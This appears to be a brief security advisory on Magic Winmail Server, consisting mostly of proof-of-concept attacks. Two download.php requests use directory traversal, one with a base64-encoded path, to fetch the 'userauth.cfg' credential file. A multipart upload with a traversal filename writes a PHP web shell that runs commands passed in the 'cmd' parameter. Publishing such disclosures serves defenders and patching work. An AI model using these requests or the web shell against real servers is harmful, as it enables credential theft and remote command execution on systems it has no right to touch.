Magic Winmail Server Multiple Vulnerabilities

Magic Winmail Server Multiple Vulnerabilities

Exploits are not required.

The following proof of concept is available exploiting the download directory traversal vulnerability to attain the 'userauth.cfg' file:

http://www.example.com:6080/download.php?
sid=656041e927559a2ff& // this must be the current session id
tid=0&folder=INBOX&ix=0&part=1&optype=download&type=nonmime&filename=Ly4uLy4uLy4uLy4uL3VzZXJhdXRoLmNmZw==

// Note Ly4uLy4uLy4uLy4uL3VzZXJhdXRoLmNmZw== is the base64 encoding of /../../../../userauth.cfg

http://www.example.com:6080/download.php?
sid=656041e927559a2ff&
tid=0&folder=INBOX&ix=0&part=1&optype=download&cache=1&filename=/../../../../userauth.cfg

The following proof of concept is available for the upload directory traversal vulnerability:
-----------------------------31140333525651
Content-Disposition: form-data; name="userfile1"; filename="/../../../a.php"
Content-Type: application/download

<?php
system($_GET[cmd]);
?>